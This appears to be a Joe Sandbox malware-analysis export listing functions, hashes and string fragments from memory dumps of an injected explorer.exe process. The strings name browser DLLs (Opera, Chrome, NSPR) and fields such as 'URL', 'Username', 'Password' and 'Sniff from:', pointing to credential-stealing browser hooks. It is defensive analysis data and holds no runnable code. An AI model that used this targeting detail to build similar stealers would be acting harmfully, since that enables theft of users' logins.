Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 8b0e90c2c8f851420cfd371f9917a59e9b09f420552c05701c328ce0f2f06402
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 66C16D74619B098FC798EF24C48A6DAF3E1FF98304F50472EA59AC7250DF70A515CB8A

Function 10075F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 10075F88
r, xrefs: 10075FB8
r, xrefs: 10075F90
n, xrefs: 10075F6B
r, xrefs: 10075FB0
r, xrefs: 10075FA0
0, xrefs: 10075F5B
c, xrefs: 10075FC8
r, xrefs: 10075FC0
r, xrefs: 10075FA8
r, xrefs: 10075F98
., xrefs: 10075F63

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 31af1cd775c5c42ebbe92b7892b62b9e6118228dfc374f803d722c6db78ff838
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: F851E93051C7488FD759CF18D8856AAB7E5FBC5700F50592EE8CBC7242DBB8A906CB86

Function 106E3F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 106E3FC0
r, xrefs: 106E3F98
0, xrefs: 106E3F5B
r, xrefs: 106E3FA8
r, xrefs: 106E3F90
r, xrefs: 106E3FB0
r, xrefs: 106E3F88
r, xrefs: 106E3FA0
., xrefs: 106E3F63
r, xrefs: 106E3FB8
n, xrefs: 106E3F6B
c, xrefs: 106E3FC8

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 985af27aafb363fa9345a5b9926185ecb731da372c2f9b81cb984d2b943c88b8
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 3C51E2305197488FD749CF19D8852EAB7E5FBC4700F501A2EE9CBC7202DBB4A946CB82

Function 1006F2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 1006F614
4.dl, xrefs: 1006F4DB
opera_browser.dll, xrefs: 1006F629
l, xrefs: 1006F4E2
nspr, xrefs: 1006F4D4
cli., xrefs: 1006F327
dll, xrefs: 1006F32E
sspi, xrefs: 1006F320

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: ef5ff8cc2cf3e82a54bcd564db4c8d109b8d8b69b51d4afd8de9f289dbad8c9b
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: CDC1A275618E194FC748EF28D456AEAB3E5FB98300F81832DA44EC7251DF34AA02C789

Function 1006F2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dragon_s.dll, xrefs: 1006F614
4.dl, xrefs: 1006F4DB
opera_browser.dll, xrefs: 1006F629
l, xrefs: 1006F4E2
nspr, xrefs: 1006F4D4
cli., xrefs: 1006F327
dll, xrefs: 1006F32E
sspi, xrefs: 1006F320

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: f41e754bfa382c840790d20051ad491a59cc0920eb73e083d6da3d1f335d9e39
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: F5C1A275618E194FC748EF68D496AAAB3E5FB98300F91832DA44EC7251DF34EA01C785

Function 106DD2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 106DD327
sspi, xrefs: 106DD320
opera_browser.dll, xrefs: 106DD629
l, xrefs: 106DD4E2
nspr, xrefs: 106DD4D4
dll, xrefs: 106DD32E
dragon_s.dll, xrefs: 106DD614
4.dl, xrefs: 106DD4DB

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: a72d54d7883ab3c9a9a57cf387d086845ae573c04a8f11b13517e8a877568dd6
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 2EC1A174619B198FC788EF28D496AEAB3E1FB98304F514329A45EC7251DF30E906C7C9

Function 106DD2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

cli., xrefs: 106DD327
sspi, xrefs: 106DD320
opera_browser.dll, xrefs: 106DD629
l, xrefs: 106DD4E2
nspr, xrefs: 106DD4D4
dll, xrefs: 106DD32E
dragon_s.dll, xrefs: 106DD614
4.dl, xrefs: 106DD4DB

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 96313ca255b8f03ff13566334ecdb17488375098307338a1661c390643a149e7
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 60C1A174619B198FC788EF28D496AEAB3E1FB98304F51432DA44EC7251DF30E906C789

Function 10070CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

L: , xrefs: 10070D66
User, xrefs: 10070DAB
name, xrefs: 10070DB2
2, xrefs: 10070DE1
word, xrefs: 10070D9E
Pass, xrefs: 10070D97
UR, xrefs: 10070D5F

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: d36e8e40f9a07e1764687a9ff83ccb83be139b85b3cfceeec1a1065c662e4162
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: F7A190706187488BDB19DFA8D445BEEB7E1FF88300F40862DE48AD7292EF7496458789

Function 106DECD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

L: , xrefs: 106DED66
2, xrefs: 106DEDE1
name, xrefs: 106DEDB2
UR, xrefs: 106DED5F
Pass, xrefs: 106DED97
User, xrefs: 106DEDAB
word, xrefs: 106DED9E

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 963f7cfbcc60dea6c1569aa0b984f61d89c2ed0632ba155b4490076803fe8c16
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: CDA1CF706187488FDB58EFA8D444BEEB7E1FF88340F40462DE48AD7242EF7099468789

Function 10070CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

L: , xrefs: 10070D66
User, xrefs: 10070DAB
name, xrefs: 10070DB2
2, xrefs: 10070DE1
word, xrefs: 10070D9E
Pass, xrefs: 10070D97
UR, xrefs: 10070D5F

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: e07c0f7fa4dbe2c42f53c7e08da88ed058f281a032444956cbafa6c41079e100
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 8C9191706187488BDB18DFA8D444BEEB7E1FF88300F40862DE48AD7252EF7495458789

Function 106DECE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

L: , xrefs: 106DED66
2, xrefs: 106DEDE1
name, xrefs: 106DEDB2
UR, xrefs: 106DED5F
Pass, xrefs: 106DED97
User, xrefs: 106DEDAB
word, xrefs: 106DED9E

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 54b886485c3332b766101ed48d11cd832cbfc7c1f4e38e3851302d41c897e1b4
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 5791AF70619B488FDB58DFA8D444BEEB7E1FF98340F40462EE48AD7242EF7099458789

Function 10070352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 100703B0
v, xrefs: 100704A0
, xrefs: 1007047C
e, xrefs: 1007048E
n, xrefs: 100703E7

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 6b1d5be27c99afb12fcf95a21b05be0004aaa25105be746046496147f0dd3e3a
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: AF71B335618B488FD758DFA8C4897AAB7F0FF58304F00462FE48AC7221EB74E9458B85

Function 106DE352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 106DE4A0
., xrefs: 106DE3B0
, xrefs: 106DE47C
e, xrefs: 106DE48E
n, xrefs: 106DE3E7

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: d2a69b9187e2b3840e6e9e6ab373e35c0f837db398886f35a7abc25825fc606a
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 5871A5356187498FD758EF68D4897AAB7F1FF98304F00062EE48AC7221EF71E9458B85

Function 1006BC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 1006BC64
ole3, xrefs: 1006BC5D
shel, xrefs: 1006BC90
l32., xrefs: 1006BC97
dll, xrefs: 1006BC9E

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 0b1f8bfae6c8e0ce627226f7a7a4f1a752deee81b5081f468728f955e3fa53e2
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: E2514FB0918B4C8FDB64DFA4C445AEEB7F1FF58300F40462EA59AE7215EF70A5418B89

Function 106D9C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

ole3, xrefs: 106D9C5D
2.dl, xrefs: 106D9C64
shel, xrefs: 106D9C90
dll, xrefs: 106D9C9E
l32., xrefs: 106D9C97

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 1ee0edf01d9f049a382a2d61dc256ef4a483a92a1be964d03890a718aa540e72
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 6B514CB0918B4C8FDB94DFA4C445AEEB7F1FF58300F40462EA59AE7214EF70A5458B89

Function 1006C86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

dll, xrefs: 1006C8F4
4, xrefs: 1006C9E9
vers, xrefs: 1006C8E4
\, xrefs: 1006C9E0
ion., xrefs: 1006C8EC

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 2cbf97fe00ac1729a5c4ed69d34a8823219c51527799be773b951fb67e858eb4
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: 0B41C534618B8C8FCBA5DF648845BEB73E5FB98345F41462E998EC7201EF30D9058782

Function 106DA86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

vers, xrefs: 106DA8E4
dll, xrefs: 106DA8F4
4, xrefs: 106DA9E9
\, xrefs: 106DA9E0
ion., xrefs: 106DA8EC

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 13d922074a2ae0e02191c90de0ed24c3a34f42dbc95f71d7a606e6d6af34070e
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: C0416134219B488BCBA5DF2498457EE73E4FB98341F41462E989EC7240EF30D545C786

Function 1006E4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 1006E50E
32.d, xrefs: 1006E4DA
user, xrefs: 1006E4D3
cli., xrefs: 1006E515
dll, xrefs: 1006E51C

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: aead5b8f7a9ab9c18e458202f522343f5ba1f5f763a8870e3be5f44ff2bd485a
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 2E418E30A18F5D8FCB94EFA8C0957AD73E2FB68344F51456AA84ED7201EE74D9408BC6

Function 106DC4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

sspi, xrefs: 106DC50E
dll, xrefs: 106DC51C
cli., xrefs: 106DC515
user, xrefs: 106DC4D3
32.d, xrefs: 106DC4DA

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 29033893920e23016bc189dcc1a96b3a1d6bf63ead621e46f0643158fa3f8382
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 52417130A19F0E8FCB88EF5890957ED77E1FB68350F51016AA84ED7344DA70E9518B86

Function 1006C432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

el32, xrefs: 1006C537
h, xrefs: 1006C51F
.dll, xrefs: 1006C53F
kern, xrefs: 1006C52A

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: 67befc92bcf8fb50d100523a792e059abd0ed296600c7db49dcea90ebfc57837
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: F4417070A08B4D8FD7A5DF2884947BABBE1FB98340F104A2F949EC2255DF70D985CB81

Function 106DA432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 106DA52A
el32, xrefs: 106DA537
h, xrefs: 106DA51F
.dll, xrefs: 106DA53F

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: bc8a50ed5c161006240d13d10a5d1e50934917ae417aa56347b9ca039821c258
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 3541B07060CB498FD7A8CF2990883AAB7E1FB98341F104B2E949EC3255DF70D945CB85

Function 100730B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 1007313D
, xrefs: 10073184
Snif, xrefs: 10073154
om:, xrefs: 10073146

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 17781fa7b8aec42d13c0173b8611a0eac9b8dc2876ad3be71ca0fe83a4015cad
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 9D31E13050DB885FD75ADB28C4866EAB7D0FB84300F50891EE4DBC7252EE34A64ACB47

Function 106E10B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 106E113D
, xrefs: 106E1184
om:, xrefs: 106E1146
Snif, xrefs: 106E1154

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 36a5dac80d3158b895ebe696bb8cdb1711673ffebe34d972990ff983a30aad1f
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: BC31243151EB885FC79ADB29C4856DAB7D0FF84300F50491EE49BC7251EE30A54ACB47

Function 100730C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 1007313D
, xrefs: 10073184
Snif, xrefs: 10073154
om:, xrefs: 10073146

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 87cf5671a5efff34f91971c1a69c71d18978934f71d2d78c97b1017830cddfcf
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: AB31E271508B486FD75ADB28C4866EAB7D4FB94340F40892EE4DBC3252EE34A50ACB47

Function 106E10C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 106E113D
, xrefs: 106E1184
om:, xrefs: 106E1146
Snif, xrefs: 106E1154

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: bb0c3ebd58184339bd5203a7cfd88a89d85d61c6ae165867b48bdda7954e5491
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 1B31013141AB48AFD399DB29C4856EAB3D4FB98300F50491EF49BC7241EE30E946CB46

Function 1006EFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

chro, xrefs: 1006F023
hild, xrefs: 1006EFF6
me_c, xrefs: 1006EFEE
.dll, xrefs: 1006EFFE

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 8731d81c00d1c932491852339d81ad87bcbfd5b431a042ae4c005c2bfdc9ad3c
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: D931A374118B484FC785EF288496BAA77E1FF98300F94453DA48ECB216DF34EA45C756

Function 106DCFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

hild, xrefs: 106DCFF6
me_c, xrefs: 106DCFEE
chro, xrefs: 106DD023
.dll, xrefs: 106DCFFE

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 9f0da6dd6e4655661f466ebebb920f7dbb68945db6c6fd12c5a65bf73f5e7825
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 2E316D3411AB488FC784EF298495BAAB7E1FBE8340F90066DA48ECB355DF30E9458756

Function 1006EFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

chro, xrefs: 1006F023
hild, xrefs: 1006EFF6
me_c, xrefs: 1006EFEE
.dll, xrefs: 1006EFFE

Memory Dump Source

Source File: 0000000A.00000002.3332650981.0000000010000000.00000040.00000001.00040000.00000000.sdmp, Offset: 10000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10000000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 0b408a801f8253ea6c4838af945d40b5390a7e66dfe1e50715c3c5d7bd36029a
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 9B31C274118B484FC785DF288496BAA77E1FF98300F94863DA48ECB216CF34EA41C756

Function 106DCFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

hild, xrefs: 106DCFF6
me_c, xrefs: 106DCFEE
chro, xrefs: 106DD023
.dll, xrefs: 106DCFFE

Memory Dump Source

Source File: 0000000A.00000002.3332775916.0000000010620000.00000040.80000000.00040000.00000000.sdmp, Offset: 10620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10620000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: fb44f6279472a9ee6fd8f27310b679d936db120f6f71ccf2065dd1d499d299a1
